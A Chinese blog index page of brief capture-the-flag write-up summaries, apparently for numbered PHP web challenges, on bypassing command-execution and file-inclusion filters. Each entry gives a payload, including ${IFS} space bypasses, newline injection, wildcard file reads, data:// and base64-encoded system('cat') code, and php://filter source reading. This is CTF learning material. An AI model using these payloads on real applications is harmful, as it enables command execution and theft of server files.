摘要:
在web44的基础上过滤了空格,利用$绕过空格 payload:?c=more${IFS}f*%0a 阅读全文
posted @ 2021-02-02 18:47
z1ten9
阅读(70)
评论(0)
推荐(0)
摘要:
在web43的基础上过滤了flag payload:?c=more fl*%0a 阅读全文
posted @ 2021-02-02 18:39
z1ten9
阅读(69)
评论(0)
推荐(0)
摘要:
在web42的前提下过滤了;以及cat payload:?c=more flag.php%0a 其中%0a是换行 阅读全文
posted @ 2021-02-02 18:22
z1ten9
阅读(91)
评论(0)
推荐(0)
摘要:
引用yanjiee大佬的博客了解一下>/dev/null 2>&1是个什么东西 简单来说就是会把错误重定向 那我们就不用管了,照常就行了 payload:/?c=cat flag.php; 阅读全文
posted @ 2021-02-02 18:10
z1ten9
阅读(160)
评论(0)
推荐(0)
摘要:
利用data://text/plain,.php因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,直接无视 payload:?c=data://text/plain,<?php system("cat fl*");?> 阅读全文
posted @ 2021-02-02 17:46
z1ten9
阅读(206)
评论(0)
推荐(0)
摘要:
在web37的基础上过滤了php 使用data://text/plain;base64绕过 payload:?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs= PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=即<? 阅读全文
posted @ 2021-02-02 10:13
z1ten9
阅读(147)
评论(0)
推荐(0)
摘要:
file://协议 用于访问本地文件系统,在CTF中通常用来读取本地文件 示例:http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt php://协议 php:// 访问各个输入/输出流,在C 阅读全文
posted @ 2021-02-02 10:07
z1ten9
阅读(302)
评论(0)
推荐(0)
摘要:
34,35同web33一样 web36过滤了数字 payload:?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php 注:其中?>用来代替分号 阅读全文
posted @ 2021-02-02 09:39
z1ten9
阅读(135)
评论(0)
推荐(0)
摘要:
在web32的基础上过滤了引号 payload:?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php 注:其中?>用来代替分号 阅读全文
posted @ 2021-02-02 09:29
z1ten9
阅读(169)
评论(0)
推荐(0)

浙公网安备 33010602011771号